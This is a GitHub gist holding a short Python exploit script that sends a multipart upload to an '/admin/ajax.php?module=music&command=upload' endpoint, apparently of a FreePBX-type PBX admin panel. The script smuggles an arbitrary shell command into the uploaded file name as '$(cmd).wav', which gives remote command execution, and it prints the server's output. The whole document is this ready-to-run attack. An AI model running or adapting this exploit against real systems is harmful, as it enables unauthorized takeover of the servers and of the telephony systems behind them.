Skip to content

Instantly share code, notes, and snippets.

@simonuvarov
Created August 9, 2018 09:49
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save simonuvarov/ab5f549707e29c32a6e6b50ffcf995f0 to your computer and use it in GitHub Desktop.
import requests
from sys import argv
import base64
def main():
url = 'http://' + argv[1] + '/admin/ajax.php?module=music&command=upload'
cmd = argv[2]
multipart_form_data = {
'extension': (None, '0'),
'language': (None,'en'),
'filename': (None, 'fa.wav'),
'codec[1]': (None, 'gsm'),
'id': (None, '1'),
'files[1]': ('$(' + cmd + ').wav', 'exploit by @simonuvarov')
}
headers = {
'Referer': url + '/admin/ajax.php'
}
response = requests.post(url, files=multipart_form_data, headers=headers)
print(response.text.replace(b"\\n", b"\n"))
if __name__ == '__main__':
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment